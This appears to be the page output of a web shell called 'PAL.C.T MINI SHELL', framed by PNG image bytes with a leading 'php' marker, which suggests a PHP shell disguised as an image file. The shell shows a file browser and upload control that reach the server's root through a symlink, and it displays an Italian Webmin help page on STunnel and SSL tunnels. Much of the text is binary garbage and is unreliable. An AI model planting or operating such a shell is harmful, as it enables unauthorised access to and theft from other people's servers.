php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/libexec/webmin/stunnel/help/
upload
files >> /var/www/html/sub/images/sym/root/usr/libexec/webmin/stunnel/help/intro.it.auto.html

<header> Introduzione ai tunnel SSL </header> SSL è un protocollo per crittografare i dati in una connessione TCP mentre viaggia attraverso la rete. È stato originariamente sviluppato per proteggere il traffico tra browser Web e server, ma può essere utilizzato per crittografare qualsiasi tipo di flusso di dati che verrebbe normalmente inviato tramite il protocollo TCP. <p> Il protocollo SSL consente a client e server di autenticarsi reciprocamente, in modo che un client possa essere sicuro di connettersi realmente all&#39;host che pensa di essere. Questo viene fatto utilizzando certificati emessi da un&#39;autorità di certificazione riconosciuta dal client (in modo che possano essere verificati) e associati a un determinato nome host. Senza certificati, un utente malintenzionato potrebbe reindirizzare una connessione SSL al proprio server e acquisire informazioni riservate da un client che pensa che stia parlando con il server reale. <p> Tutti i dati che viaggiano su Internet non crittografati possono essere acquisiti e letti da un utente malintenzionato con accesso a una delle reti che attraversa. Anche i dati che viaggiano tra un sistema client e server su una LAN possono essere facilmente ascoltati. Quando ci si connette a un server telnet, FTP o POP3, la password viene inviata sulla rete e può quindi essere acquisita da un utente malintenzionato. <p> SSL può essere utilizzato per proteggere i dati in questo tipo di situazioni, ma solo se supportati sia dal client che dal server. La maggior parte dei browser Web e dei client di posta può effettuare connessioni HTTP, POP3 e IMAP crittografate con SSL, ma non tutti i server Web e POP3 possono accettarle. POP3 in particolare è difficile da proteggere, perché il server standard fornito con la maggior parte dei sistemi Unix non supporta affatto SSL. Fortunatamente esiste una soluzione: STunnel. <p> STunnel è un semplice programma che converte una connessione non crittografata in una crittografata SSL. In genere è configurato per essere eseguito da un super-server come inetd o xinetd, quindi eseguire altri programmi come il server POP3 che non supporta SSL. Questo design gli consente di proteggere qualsiasi server normalmente eseguito da inetd, come i server telnet, NNTP e IMAP. <p> Tuttavia, non tutti i server possono essere utilmente protetti con la crittografia, poiché non esiste alcun client per utilizzarli in modalità SSL. Ad esempio, non ho mai sentito parlare di un client telnet o FTP in grado di utilizzare SSL, poiché il pacchetto SSH comune consente già accessi remoti crittografati e trasferimenti di file. <p> Questo modulo Webmin semplifica la configurazione di servizi super-server che eseguono STunnel per avviare alcuni programmi server. Anche se questo può essere fatto manualmente utilizzando il modulo Servizi Internet, questo è specificamente progettato per l&#39;installazione e la configurazione di STunnel. Rileva automaticamente se hai installato inetd e / o xinetd, legge le loro configurazioni per verificare la presenza di tunnel SSL esistenti e li aggiunge quando crei un nuovo tunnel. Se entrambi sono installati, i nuovi tunnel SSL vengono aggiunti alla configurazione di xinetd poiché è il superiore dei due secondo me. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`